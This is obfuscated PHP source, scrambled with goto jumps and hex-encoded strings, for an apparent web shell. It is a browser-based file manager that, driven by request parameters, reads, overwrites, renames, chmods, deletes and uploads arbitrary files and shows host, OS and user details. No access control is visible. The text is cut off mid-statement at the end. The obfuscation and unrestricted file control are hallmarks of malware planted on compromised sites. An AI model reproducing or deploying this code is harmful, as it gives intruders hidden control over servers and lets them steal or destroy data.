goto Z7BiC; MqVWM: $fSRvP = $fMLG0; goto lGlVH; k2vUV: echo "\x22\57\x3e\xd\12\40\40\x20\40\x20\x20\x20\x20\x20\40\x3c\x64\x69\166\x20\x63\x6c\141\163\x73\75\42\146\157\162\155\55\x67\162\157\x75\160\x22\x3e\15\12\x20\40\40\x20\x20\40\40\40\x20\40\x20\40\40\x3c\x69\156\x70\x75\x74\x20\164\x79\x70\145\75\42\x74\145\x78\164\x22\40\143\x6c\141\x73\163\x3d\x22\146\x6f\x72\155\55\143\x6f\156\x74\x72\x6f\x6c\x22\40\x69\x64\75\x22\x6e\145\x77\137\x6e\x61\155\145\42\x20\x6e\141\x6d\145\x3d\x22\x6e\145\167\x5f\156\x61\x6d\x65\x22\x20\166\141\154\165\x65\x3d\42"; goto UefjI; ndhOW: echo htmlspecialchars($c2StX); goto Soo4V; fEIb4: $xAfPk = $gwwRO . $Jb4dK; goto oXatu; dTX1c: echo basename($zNdcv); goto aJ5jw; S47eX: echo $ofUbe["\110\x54\x54\120\x5f\110\x4f\123\x54"]; goto BW8ZF; UDuBA: $c2StX = file_get_contents($zNdcv); goto z5lhs; PnMuI: $L05FZ = true; goto RNvOR; m6N0L: jooaI: goto iGz4T; jSugX: $fSRvP = substr(sprintf("\x25\157", $RlY2U), -4); goto lzoLu; lvJsJ: if ($Ys9sn == 7) { goto cA1Fs; } goto ceVJp; nvAUa: $cFYjf = false; goto JEB6r; LkRSk: $Jb4dK = str_replace($SJWhn, '', $rR7IS); goto fEIb4; WGfqe: jWxst: goto hZG7p; RPYLT: $o_Wzc = $_POST["\146\151\x6c\145\137\156\x65\167\137\156\141\155\x65"]; goto K5ZPE; tNxJ8: $Ys9sn = $_REQUEST["\164\x79\x70\145"]; goto l21LL; EcsIJ: goto kzURu; goto b8N3R; xEieJ: E2Tr6: goto bD7mu; l8rz4: N8uAm: goto k5dlp; QILi5: echo get_current_user(); goto c9bPI; Nuyek: $c8aSu = 0; goto Spy0q; Fnep0: DchLH: goto TEVW7; nEYNh: $ofUbe = $_SERVER; goto MB4e4; mj8Zf: $WODEV = trim($_POST["\x6e\x65\x77\137\x6e\x61\155\145"]); goto RIK5i; PmoAp: echo "\x3c\x2f\x70\76\15\12\40\x20\40\40\40\40\74\160\x3e\x4f\x53\x3a\x20"; goto tV2Nq; tI8C0: goto l3vVd; goto WGfqe; j3a5Z: goto kMh6W; goto xEieJ; Z8i4F: session_start(); goto tNxJ8; ggv6I: bib8O: goto bFLO4; S0r8u: $zNdcv = $ofUbe["\x53\x43\122\x49\x50\124\137\x46\111\x4c\105\x4e\x41\x4d\105"]; goto c1Sh9; b8N3R: fKP2w: goto g26h6; hZG7p: echo "\x3c\144\151\166\x20\x63\x6c\x61\163\163\x3d\42\141\x6c\x65\162\164\x20\141\154\x65\x72\x74\x2d\x73\165\143\x63\x65\163\163\42\40\162\x6f\154\145\x3d\42\x61\154\x65\x72\x74\42\76\344\xbf\256\346\224\271\346\226\x87\xe4\273\266\xe5\220\x8d\347\xa7\260\346\x88\x90\xe5\x8a\x9f\x21\x3c\x2f\144\151\166\76"; goto FUypo; ZEoWb: RcXJt: goto Vj9ug; CN8Bn: XNoIE: goto K85ok; uJSi9: $c2StX = file_get_contents($zNdcv); goto UT1i7; mmQnE: echo "\x3c\144\x69\166\40\143\x6c\141\x73\x73\x3d\x22\x61\154\x65\x72\164\40\141\154\x65\x72\x74\55\144\141\x6e\147\145\x72\42\x20\x72\157\154\x65\x3d\42\141\x6c\x65\x72\x74\42\x3e\344\277\256\346\224\271\346\226\x87\xe4\xbb\266\345\220\215\347\xa7\260\345\xa4\261\xe8\264\245\x21\74\x2f\x64\x69\166\x3e"; goto tI8C0; iFrhD: if (!($_POST["\x61\143\x74"] == "\144\145\154")) { goto VCwaK; } goto N2Wn2; pWpbl: $rR7IS = $l7f3r; goto PUY2n; ruHs8: if (!empty($fMLG0)) { goto DchLH; } goto Tsr1t; Awj1p: function DjhTS($h1gSF) { goto Y3zNF; jYhn7: $eRBh9 = "\165"; goto DdNZQ; zt_iG: goto ZjtBQ; goto mumHZ; dTOE0: $eRBh9 .= $fB2UT & 0x4 ? "\x72" : "\x2d"; goto khaiZ; uAs6e: $eRBh9 = "\x2d"; goto YjA6Y; aznK3: S1ycr: goto KJhA7; N1UH_: $eRBh9 .= $fB2UT & 0x80 ? "\x77" : "\55"; goto lQRKq; tD38a: if (($fB2UT & 0x4000) === 0x4000) { goto LZGPr; } goto eyYvt; OsNVN: Hpn0x: goto uAs6e; rMAyM: if (($fB2UT & 0xa000) === 0xa000) { goto S1ycr; } goto NXMU6; KJhA7: $eRBh9 = "\154"; goto xxExS; mumHZ: pLh79: goto ce2QB; tinrz: return $eRBh9; goto tNn6J; ilfNj: goto ZjtBQ; goto aznK3; ldtFB: $eRBh9 .= $fB2UT & 0x8 ? $fB2UT & 0x400 ? "\163" : "\x78" : ($fB2UT & 0x400 ? "\123" : "\x2d"); goto dTOE0; xLFd9: $eRBh9 .= $fB2UT & 0x20 ? "\162" : "\x2d"; goto SWTpE; DdNZQ: goto ZjtBQ; goto kriHz; kQxMs: $eRBh9 .= $fB2UT & 0x1 ? $fB2UT & 0x200 ? "\164" : "\x78" : ($fB2UT & 0x200 ? "\x54" : "\x2d"); goto tinrz; xxExS: goto ZjtBQ; goto OsNVN; eyYvt: if (($fB2UT & 0x2000) === 0x2000) { goto lAJV0; } goto qy0F9; SWTpE: $eRBh9 .= $fB2UT & 0x10 ? "\167" : "\55"; goto ldtFB; DdYqc: $eRBh9 = "\143"; goto zt_iG; luryB: $eRBh9 .= $fB2UT & 0x100 ? "\x72" : "\x2d"; goto N1UH_; Y3zNF: clearstatcache(true, $h1gSF); goto uRgx0; hcOSu: $eRBh9 = "\x73"; goto ilfNj; MmkBx: if (($fB2UT & 0xc000) === 0xc000) { goto k7UkL; } goto rMAyM; kriHz: k7UkL: goto hcOSu; khaiZ: $eRBh9 .= $fB2UT & 0x2 ? "\x77" : "\x2d"; goto kQxMs; prgpo: goto ZjtBQ; goto O1a7z; f8DTQ: $eRBh9 = "\144"; goto RGBPK; uRgx0: $fB2UT = fileperms($h1gSF); goto MmkBx; ce2QB: $eRBh9 = "\x70"; goto v5QlO; rJ7v3: $eRBh9 = "\x62"; goto prgpo; v5QlO: ZjtBQ: goto luryB; YjA6Y: goto ZjtBQ; goto Dv3LX; lQRKq: $eRBh9 .= $fB2UT & 0x40 ? $fB2UT & 0x800 ? "\163" : "\170" : ($fB2UT & 0x800 ? "\x53" : "\x2d"); goto xLFd9; qy0F9: if (($fB2UT & 0x1000) === 0x1000) { goto pLh79; } goto jYhn7; RGBPK: goto ZjtBQ; goto ZbZh5; NXMU6: if (($fB2UT & 0x8000) === 0x8000) { goto Hpn0x; } goto ORmYg; O1a7z: LZGPr: goto f8DTQ; ZbZh5: lAJV0: goto DdYqc; Dv3LX: Yvp3B: goto rJ7v3; ORmYg: if (($fB2UT & 0x6000) === 0x6000) { goto Yvp3B; } goto tD38a; tNn6J: } goto gbIkE; jquYe: yk9VU: goto Ff6Uv; VUPm7: SzLxJ: goto Nt0A3; BqCBI: echo $zNdcv; goto jS6a3; UC1K6: kMh6W: goto ggv6I; LpF6j: if (is_file($rR7IS . "\57" . $WODEV)) { goto N8uAm; } goto spMiC; HOK7l: NBGNA: goto lOrCg; ysBGs: Mu4fl: goto Td1gf; dQamU: echo "\x73\x74\171\154\x65\x3d\x22\143\157\154\157\x72\72\147\x72\x65\x65\x6e\x3b\42"; goto DcE9m; iGz4T: nhJ4J: goto KKPGU; ZSmrH: if (!($Ys9sn == 1)) { goto gcbod; } goto KTTG5; gbIkE: function qUHoz($rR7IS, $zPdIb) { goto rvUf9; Qbdnu: $iO_db = array(); goto QcxOi; M0lPw: $zPdIb = array_merge($wqiih, $iO_db); goto bJGT9; txaCb: sort($iO_db); goto M0lPw; rvUf9: $wqiih = array(); goto Qbdnu; bJGT9: return $zPdIb; goto NpKzo; BAX1T: sort($wqiih); goto txaCb; QcxOi: foreach ($zPdIb as $SU56i => $qMSGe) { goto Ck8T7; Ck8T7: if (is_dir($rR7IS . "\x2f" . $qMSGe)) { goto CVHZc; } goto L1Rqw; Di9sw: CVHZc: goto zzgBr; kqdSf: PbUnd: goto kfjxE; zzgBr: $wqiih[] = $qMSGe; goto kqdSf; L1Rqw: $iO_db[] = $qMSGe; goto x0GdV; x0GdV: goto PbUnd; goto Di9sw; kfjxE: hH2Zs: goto taFmo; taFmo: } goto rxMna; rxMna: y9kOX: goto BAX1T; NpKzo: } goto vab4q; d8IGJ: echo "\42\x3e\xd\12\x20\x20\x20\x20\x20\40\40\x20\x20\40\x3c\x2f\x64\x69\x76\x3e\xd\xa\40\40\x20\x20\x20\40\x20\40\x20\x20\x3c\142\x75\164\x74\157\156\40\164\171\x70\x65\75\42\163\x75\142\x6d\151\x74\x22\40\143\x6c\x61\x73\163\75\x22\x62\164\156\x20\142\164\x6e\55\x73\165\x63\x63\x65\163\x73\x22\76\x45\x64\x69\164\74\x2f\x62\165\x74\x74\x6f\156\76\xd\xa\x20\x20\x20\40\x20\x20\40\40\74\57\146\x6f\x72\x6d\x3e\xd\12\x20\x20\x20\40\74\x2f\x64\x69\x76\76\15\12\x20\40\40\40"; goto ysBGs; h3CAh: if ($Ys9sn == 5) { goto zMrCb; } goto bbEbh; FUypo: $zNdcv = $rR7IS . "\57" . $o_Wzc; goto B49ST; a1MI5: echo "\x3c\x64\151\166\x20\x63\154\x61\163\x73\x3d\x22\x61\154\x65\162\x74\x20\x61\154\x65\x72\x74\55\144\141\156\x67\145\x72\42\40\162\157\154\x65\x3d\42\x61\x6c\145\x72\x74\x22\x3e\346\226\207\344\xbb\xb6\xe4\270\212\xe4\274\xa0\345\xa4\261\350\264\245\x21\x3c\x2f\x64\x69\x76\x3e"; goto mg8p2; ay6MS: echo "\x3e\x57\162\x69\164\x65\x61\142\x6c\x65\74\57\x73\x70\141\x6e\76\xd\12\x20\x20\x20\x20\40\40\x3c\57\160\x3e\xd\12\x20\x20\74\57\x64\x69\166\76\15\xa\40\40"; goto bOSZE; K5ZPE: if (empty($o_Wzc)) { goto yk9VU; } goto YFVK9; Z7BiC: echo "\40\x20\x20\40\x3c\144\151\166\40\143\x6c\x61\163\163\x3d\42\x72\157\x77\42\x3e\xd\xa\x20\x20\40\x20\x20\x20\x20\40\74\146\157\162\x6d\40\x61\143\x74\x69\x6f\x6e\75\42\77\x74\x79\x70\145\75\66\42\x20\155\x65\x74\x68\157\144\x3d\x22\x70\157\x73\x74\x22\x3e\15\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\74\x69\x6e\160\x75\164\40\x74\x79\160\145\75\x22\x68\x69\144\x64\145\x6e\42\40\151\x64\75\42\x70\x61\x74\x68\x22\x20\156\141\x6d\145\x3d\42\160\x61\164\150\42\40\166\x61\x6c\x75\x65\x3d\x22"; goto EigEA; wpPQi: goto DF0kr; goto hJDjB; ZC5vr: if ($L05FZ) { goto gWR1M; } goto egL8j; gwdz4: if ($KXLmd) { goto jWxst; } goto mmQnE; l21LL: $l7f3r = $_REQUEST["\160\141\x74\x68"]; goto nEYNh; KKPGU: VCwaK: goto vkQD9; CRYRe: $YEU_b = file_put_contents($l7f3r, $GTqll); goto NUhLS; RNvOR: lEB6U: goto LkRSk; bD7mu: if (mkdir($rR7IS . "\57" . $WODEV)) { goto ATM9T; } goto No7ER; D11ht: z0mx7: goto dvHij; g26h6: foreach ($iO_db as $SU56i => $qMSGe) { goto FJHEq; ur5h1: echo "\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x3c\x2f\x74\x64\76\xd\xa\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x3c\x74\144\76\15\xa\x20\40\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x3c\x61\40\143\x6c\141\x73\163\x3d\x22\x62\x74\x6e\x20\x62\x74\156\55\x70\162\x69\155\141\x72\x79\40\142\164\156\55\x78\x73\x22\x20\150\x72\x65\x66\x3d\x22\x3f\160\141\164\x68\75"; goto cz2Jv; MfH2j: Zbf8P: goto ur5h1; cz2Jv: echo $qlsv7; goto NYsAQ; CKn9n: if (is_dir($qlsv7)) { goto PyYvN; } goto uH874; hkWJg: YANt5: goto Da8gk; sjHYh: echo "\x3c\146\x6f\156\x74\40\143\x6f\x6c\157\162\75\x22\x67\162\145\145\156\x22\40\x73\x74\x79\x6c\145\x3d\x22\x66\157\156\x74\x2d\167\x65\151\x67\x68\x74\72\40\x62\x6f\x6c\x64\73\x22\x3e\104\151\x72\x65\143\164\x6f\162\171\x3c\57\x66\157\156\x74\x3e"; goto svuL8; kBmKW: echo $qlsv7; goto JRmLL; oul1Q: echo "\42\40\156\x61\155\x65\75\x22\143\150\x69\154\144\143\150\145\143\x6b\x5b\x5d\42\x3e\15\xa\x20\40\40\40\x20\x20\40\40\40\40\x20\40\x20\40\x20\x20\x3c\57\144\x69\x76\76\15\12\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\74\x2f\x74\x68\x3e\x20\xd\12\x20\x20\x20\40\40\40\x20\40\x20\x20\40\x20\74\x74\144\x3e\xd\xa\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40"; goto kjx0j; AiM1n: echo $xAfPk . "\57" . $qMSGe; goto wwDGH; TpvmV: $jjmbu = dJhtS($qlsv7); goto mdX8j; zudZJ: echo "\74\x61\x20\150\x72\145\x66\75\42\77\160\x61\164\x68\75" . $qlsv7 . "\46\x74\x79\x70\145\75\x31\42\40\163\x74\171\x6c\145\75\x22\143\157\154\x6f\x72\x3a\x20\147\x72\x65\x65\156\x3b\x66\157\156\x74\x2d\167\145\151\x67\150\164\x3a\x62\157\x6c\144\73\42\x3e\15\xa\x20\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\40\x20\40\40\40\40\74\151\x20\x63\x6c\141\163\x73\75\x22\x62\x69\x20\x62\x69\x2d\x66\x6f\154\x64\x65\x72\x22\x20\x73\x74\x79\154\x65\x3d\42\166\x65\162\164\151\143\141\x6c\55\141\x6c\151\x67\x6e\72\40\155\151\x64\x64\x6c\x65\x3b\x22\x3e\15\xa\40\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20\74\163\x76\147\x20\170\x6d\154\x6e\163\x3d\x22\150\164\x74\160\x3a\x2f\57\x77\x77\167\56\x77\63\56\x6f\162\147\x2f\x32\60\60\60\x2f\163\x76\147\x22\x20\x77\151\x64\164\x68\x3d\42\x31\x36\42\x20\x68\x65\x69\147\x68\164\75\42\x31\x36\x22\x20\146\x69\x6c\154\x3d\42\143\x75\162\x72\x65\x6e\164\x43\x6f\154\x6f\x72\42\x20\143\154\141\x73\163\x3d\x22\142\151\40\142\x69\x2d\146\157\x6c\144\x65\162\x22\40\166\151\x65\x77\102\x6f\x78\x3d\x22\x30\x20\60\40\61\66\40\61\x36\42\76\15\12\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\x3c\x70\141\x74\150\40\x64\x3d\42\115\x2e\65\x34\x20\x33\x2e\x38\x37\x2e\x35\x20\63\141\62\x20\62\x20\60\40\x30\x20\x31\x20\62\x2d\62\x68\x33\56\x36\x37\x32\x61\62\x20\x32\40\60\40\x30\x20\x31\40\61\56\64\x31\x34\x2e\65\x38\x36\154\56\70\x32\70\x2e\70\62\x38\x41\62\40\x32\x20\x30\x20\60\x20\60\x20\x39\x2e\70\62\70\40\x33\x68\63\x2e\x39\x38\x32\x61\x32\x20\62\x20\x30\x20\x30\40\61\x20\61\56\71\71\x32\x20\62\x2e\x31\x38\61\154\x2d\56\x36\63\67\x20\67\x41\x32\x20\62\40\x30\x20\x30\40\x31\x20\x31\63\x2e\61\x37\64\x20\x31\64\x48\x32\x2e\70\x32\x36\x61\62\40\x32\x20\x30\40\60\40\x31\55\61\56\71\x39\x31\55\61\56\70\x31\71\154\55\56\x36\63\67\55\x37\141\61\x2e\71\x39\40\61\56\x39\x39\40\60\40\60\x20\x31\40\x2e\x33\x34\62\x2d\x31\x2e\x33\61\x7a\x4d\x32\x2e\x31\x39\40\x34\141\x31\40\x31\40\60\x20\60\40\60\x2d\56\x39\x39\66\40\x31\x2e\60\71\x6c\x2e\66\x33\x37\x20\67\141\61\40\61\40\x30\40\x30\x20\x30\x20\x2e\71\x39\65\56\71\x31\x68\61\60\56\x33\64\x38\141\61\x20\x31\x20\x30\40\x30\40\x30\40\x2e\x39\71\x35\55\x2e\71\x31\x6c\56\x36\63\x37\55\x37\x41\x31\40\x31\x20\60\x20\x30\40\60\40\x31\63\x2e\70\x31\x20\64\110\62\56\x31\x39\172\x6d\64\x2e\66\71\55\61\56\x37\60\67\101\x31\x20\x31\40\60\x20\60\40\60\40\66\x2e\61\67\x32\40\x32\x48\62\56\65\141\x31\x20\x31\40\x30\40\60\x20\x30\x2d\61\x20\x2e\x39\x38\61\x6c\56\x30\x30\x36\56\x31\63\x39\103\x31\x2e\67\62\x20\63\56\x30\x34\x32\x20\61\56\x39\x35\40\x33\x20\x32\x2e\61\x39\x20\x33\x68\x35\x2e\63\71\x36\x6c\55\56\67\60\67\55\x2e\67\60\x37\172\42\57\x3e\15\xa\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\74\x2f\163\166\147\76\15\12\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\74\x2f\x69\76" . $qMSGe . "\74\57\x61\x3e"; goto RGIzJ; wwDGH: echo "\42\40\164\141\162\147\x65\164\75\x22\137\x62\154\x61\156\x6b\42\76\x63\x6c\x69\x63\x6b\x20\166\151\163\x69\164\74\57\x61\76\15\12\x20\40\40\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\40"; goto HAGQP; mdX8j: if (strpos($jjmbu, "\x77") !== false) { goto ZfgH1; } goto bkodL; RGIzJ: grCIi: goto sTRbp; IlYM2: n2vvB: goto zudZJ; bkodL: echo "\x3c\x66\x6f\156\x74\x20\143\x6f\154\157\162\x3d\42\x72\145\x64\42\x20\x73\x74\171\x6c\x65\x3d\x22\x66\157\x6e\164\x2d\x77\x65\x69\147\x68\x74\72\x20\142\157\x6c\144\x3b\x22\76" . $jjmbu . "\x3c\x2f\146\x6f\156\x74\x3e"; goto u10Og; JRmLL: echo "\x26\164\171\x70\145\75\x32\x22\76\x45\x64\x69\x74\74\x2f\141\x3e\xd\xa\40\40\x20\40\40\x20\40\40\40\40\x20\40\40\x20\40\40\74\141\x20\143\154\141\x73\x73\75\42\x62\164\156\x20\x62\164\x6e\55\x77\x61\162\156\151\x6e\x67\x20\142\164\x6e\55\170\163\x22\x20\150\x72\145\146\75\x22\x3f\x70\141\x74\150\x3d"; goto qS0SK; GvPnw: echo "\x3c\141\x20\x68\x72\x65\146\75\42\x3f\x70\141\164\150\75" . $qlsv7 . "\x26\164\x79\x70\145\75\x32\42\x3e" . $qMSGe . "\74\x2f\x61\x3e"; goto Nfk2P; Da8gk: rWxDO: goto uCUNR; HAGQP: ETvjg: goto bpGqY; WRXxI: PyYvN: goto sjHYh; aABGW: echo "\40\40\40\x20\x20\x20\40\40\40\x20\74\164\162\76\15\12\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\74\164\150\76\15\12\40\x20\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\74\144\x69\x76\x20\x63\154\x61\163\x73\75\x22\146\x6f\x72\155\55\x63\x68\x65\143\153\42\x3e\15\xa\x20\40\40\x20\x20\40\40\40\40\40\40\x20\x20\40\x20\x20\x20\40\x3c\x69\156\160\165\164\x20\143\x6c\141\x73\163\75\42\146\157\x72\155\55\x63\x68\145\x63\x6b\55\151\156\x70\165\164\x22\x20\x74\171\160\145\x3d\x22\143\x68\x65\x63\153\142\x6f\x78\x22\x20\166\141\x6c\x75\x65\75\x22"; goto pelOP; wA8xy: echo "\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\x20\40\40\x3c\141\40\150\162\x65\x66\x3d\42"; goto AiM1n; kjx0j: if (is_dir($qlsv7)) { goto n2vvB; } goto GvPnw; svuL8: y2mk2: goto NgqNv; DhDE3: echo "\46\164\171\160\x65\x3d\x35\42\76\x43\x68\x6d\157\144\74\x2f\x61\76\xd\xa\40\40\40\x20\40\40\40\40\40\40\x20\40\74\57\164\x64\76\xd\xa\x20\40\40\40\40\40\40\40\40\40\74\57\164\x72\x3e\15\xa\40\x20\40\x20\40\x20\40\x20\40\40"; goto hkWJg; F9rXM: echo "\74\146\x6f\156\x74\40\143\x6f\154\x6f\x72\75\42\x67\x72\145\145\x6e\x22\40\163\164\171\x6c\145\75\42\x66\157\156\x74\55\x77\145\x69\x67\x68\164\x3a\x20\142\x6f\x6c\x64\x3b\42\76" . $jjmbu . "\74\57\146\x6f\156\164\76"; goto MfH2j; u10Og: goto Zbf8P; goto mn00E; FJHEq: if ($qMSGe == "\56" || $qMSGe == "\56\x2e") { goto YANt5; } goto uJr2I; NYsAQ: echo "\x26\x74\171\x70\145\x3d\64\x22\x3e\x52\x65\x6e\x61\x6d\x65\x3c\x2f\x61\76\15\xa\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x3c\x61\40\x63\154\x61\x73\163\x3d\42\142\x74\x6e\40\x62\164\156\x2d\x69\x6e\x66\157\x20\142\x74\156\x2d\x78\x73\x22\x20\150\x72\145\146\75\x22\x3f\160\x61\x74\150\x3d"; goto kBmKW; qS0SK: echo $qlsv7; goto DhDE3; A1kuX: $XXWrF = filemtime($qlsv7); goto XJ3T0; cYkCo: if (is_dir($qlsv7)) { goto ETvjg; } goto wA8xy; mn00E: ZfgH1: goto F9rXM; bpGqY: echo "\40\40\40\40\40\40\x20\40\40\x20\x20\40\x3c\x2f\164\x64\x3e\15\12\40\40\40\40\40\x20\x20\40\40\x20\x20\x20\x3c\164\144\76\15\xa\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\40\40\x20\x20"; goto CKn9n; NgqNv: echo "\40\40\x20\x20\40\40\40\40\x20\40\x20\x20\74\57\x74\144\76\15\12\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\74\x74\x64\76\xd\xa\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\40"; goto A1kuX; sTRbp: echo "\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\74\57\x74\x64\x3e\15\12\40\40\x20\x20\40\40\40\x20\x20\40\40\40\74\164\x64\76\xd\12\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20"; goto cYkCo; uJr2I: $qlsv7 = $rR7IS . "\57" . $qMSGe; goto aABGW; pelOP: echo $qlsv7; goto oul1Q; uH874: echo SPVQn($qlsv7); goto P4OVE; P4OVE: goto y2mk2; goto WRXxI; Nfk2P: goto grCIi; goto IlYM2; f_A9e: echo "\40\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x3c\x2f\x74\x64\x3e\xd\12\x20\40\x20\40\x20\40\40\40\40\40\40\x20\74\x74\144\76\15\12\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\40\x20"; goto TpvmV; XJ3T0: echo date("\x59\x2d\155\x2d\x64\40\110\x3a\151\72\x73", $XXWrF); goto f_A9e; uCUNR: } goto oAhlN; Soo4V: echo "\74\57\164\145\x78\x74\x61\x72\145\141\76\15\xa\x20\40\x20\40\x20\40\x20\x20\x20\40\74\x2f\x64\151\166\x3e\15\12\40\x20\x20\40\40\40\x20\x20\40\40\74\x62\x75\x74\x74\157\156\40\x74\x79\x70\x65\x3d\42\x73\165\142\x6d\x69\164\42\40\x63\x6c\141\163\163\x3d\42\142\164\156\x20\142\x74\x6e\55\163\x75\143\x63\x65\163\163\42\76\105\x64\x69\x74\x3c\57\x62\165\x74\164\x6f\x6e\76\xd\xa\40\40\x20\x20\x20\40\x20\40\x3c\57\146\x6f\162\x6d\76\xd\12\x20\40\40\40\74\57\144\x69\166\x3e\15\12\40\40"; goto D11ht; fjD0g: echo $zNdcv; goto uyeUY; crvc6: $c2StX = file_get_contents($zNdcv); goto lE1Mc; uxVzD: $WODEV = trim($_POST["\x6e\x65\x77\137\156\141\155\x65"]); goto gukOA; ULz4z: echo "\x73\x74\171\x6c\145\x3d\x22\143\157\154\157\x72\72\162\145\144\73\x22"; goto nxgPJ; EpfHY: goto T3iAH; goto nc7Vk; bl4Gd: Af00I: goto aoSAX; k5dlp: echo "\74\144\151\x76\x20\x63\x6c\x61\x73\x73\75\42\x61\154\145\162\x74\40\x61\154\x65\162\164\x2d\144\141\x6e\x67\145\x72\x22\40\x72\x6f\154\x65\75\42\141\x6c\145\162\x74\x22\76\xe6\226\x87\344\xbb\266\xe5\xb7\262\347\273\x8f\345\255\230\345\234\xa8\41\x3c\57\144\x69\166\x3e"; goto VUPm7; Z_6AW: goto z0mx7; goto Wn9HB; UT1i7: echo "\x20\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\74\x69\156\x70\x75\164\40\x74\171\x70\145\x3d\x22\164\x65\170\x74\x22\x20\x63\x6c\141\x73\x73\x3d\42\x66\157\x72\x6d\x2d\x63\157\x6e\x74\x72\x6f\154\x22\40\151\x64\75\42\156\145\167\x5f\143\x68\x6d\157\144\x22\x20\x6e\x61\x6d\x65\75\42\x6e\x65\167\x5f\x63\150\x6d\x6f\144\x22\x20\166\141\x6c\x75\145\75\42"; goto wplCU; P9lkI: echo $zNdcv; goto sQeHU; hJDjB: ATM9T: goto o0jY6; P9mg3: echo "\46\164\171\160\x65\x3d\67\42\76\x43\162\145\x61\x74\x65\x20\106\157\154\144\145\162\74\x2f\x61\x3e\15\12\x20\40\x20\x20\x20\x20\x20\x20\x3c\57\146\157\162\155\76\15\xa\40\x20\40\x20\40\x20\x3c\57\144\x69\x76\x3e\xd\12\x20\40\x20\x20\40\x20\x3c\146\x6f\162\x6d\40\x61\x63\x74\151\157\156\75\x22\77\x70\x61\164\x68\75"; goto fjD0g; kqzgI: echo "\x3c\x64\x69\x76\x20\143\154\141\x73\x73\75\x22\141\154\x65\162\164\x20\141\x6c\x65\162\x74\55\x73\165\143\x63\x65\x73\163\x22\x20\162\x6f\x6c\x65\x3d\42\141\154\x65\x72\164\x22\x3e\346\x96\x87\344\xbb\xb6" . htmlspecialchars(basename($_FILES["\x66\151\x6c\145\124\157\125\160\x6c\x6f\x61\144"]["\156\x61\x6d\x65"])) . "\345\xb7\262\xe4\270\212\344\xbc\xa0\x21\x3c\57\x64\x69\x76\76"; goto I587b; pOYOs: echo "\x22\40\160\154\141\143\145\x68\x6f\x6c\x64\145\x72\x3d\42\116\145\x77\x20\x46\157\x6c\144\x65\162\40\116\141\x6d\x65\42\76\15\xa\40\40\40\40\40\40\x20\x20\x20\x20\74\x2f\144\x69\166\x3e\xd\xa\40\40\x20\x20\40\x20\x20\40\40\40\74\142\x75\x74\164\157\x6e\40\164\171\160\x65\75\x22\x73\x75\x62\155\x69\164\x22\40\143\x6c\141\163\x73\75\42\x62\164\156\40\142\164\156\x2d\163\165\143\x63\145\163\163\42\76\103\162\145\141\164\x65\40\116\x6f\167\x3c\57\142\165\x74\164\x6f\156\x3e\15\12\40\x20\x20\40\x20\x20\x20\40\74\57\x66\x6f\162\155\x3e\xd\12\x20\x20\x20\x20\x3c\x2f\144\x69\x76\76\15\12\x20\40"; goto o19uJ; MB4e4: $SJWhn = $ofUbe["\104\x4f\x43\125\x4d\105\x4e\x54\137\122\117\117\124"]; goto S0r8u; ip6t6: function SpVqn($qlsv7) { goto QwZ3n; UHlvv: $IGFpO = round($IGFpO / (1024 * 1024), 2) . "\40\115\102"; goto A_M8M; z199D: $IGFpO = $IGFpO . "\40\102"; goto EAS8w; A_M8M: Hu7Kj: goto gwvfc; EAS8w: goto j51ny; goto NRIsh; trTUi: goto Hu7Kj; goto OAZEA; sTSAe: if ($IGFpO > 1024) { goto oDNWm; } goto z199D; Gp3nf: j51ny: goto trTUi; OAZEA: HJ1L5: goto UHlvv; FoApu: $IGFpO = round($IGFpO / 1024, 2) . "\40\x4b\x42"; goto Gp3nf; NRIsh: oDNWm: goto FoApu; QwZ3n: $IGFpO = filesize($qlsv7); goto lO43G; gwvfc: return $IGFpO; goto LbbnD; lO43G: if ($IGFpO > 1024 * 1024) { goto HJ1L5; } goto sTSAe; LbbnD: } goto Awj1p; L0tLC: goto cdn7B; goto dKN9x; wplCU: echo $fSRvP; goto d8IGJ; lE1Mc: echo "\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\74\151\156\x70\165\x74\40\x74\x79\x70\x65\x3d\x22\164\145\170\164\x22\40\x63\154\141\x73\163\x3d\x22\146\157\162\x6d\55\x63\x6f\156\164\162\x6f\154\42\x20\151\144\75\42\x66\x69\154\x65\137\x6e\145\167\137\156\141\x6d\145\x22\x20\156\141\155\x65\75\x22\146\x69\154\x65\x5f\156\145\167\x5f\x6e\141\x6d\145\x22\40\x76\141\x6c\165\145\75\42"; goto dTX1c; m0nmf: DF0kr: goto UC1K6; lzoLu: goto xeKSD; goto Fnep0; o4vjI: echo "\42\57\76\15\12\x20\40\40\40\40\x20\40\40\x20\x20\x3c\x64\x69\x76\40\143\x6c\x61\x73\x73\75\x22\146\x6f\162\x6d\x2d\147\x72\x6f\x75\160\42\76\15\xa\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40"; goto UDuBA; lOrCg: $iO_db = scandir($rR7IS); goto UV8dq; oAhlN: CVRS7: goto XZdFF; TQqdI: echo 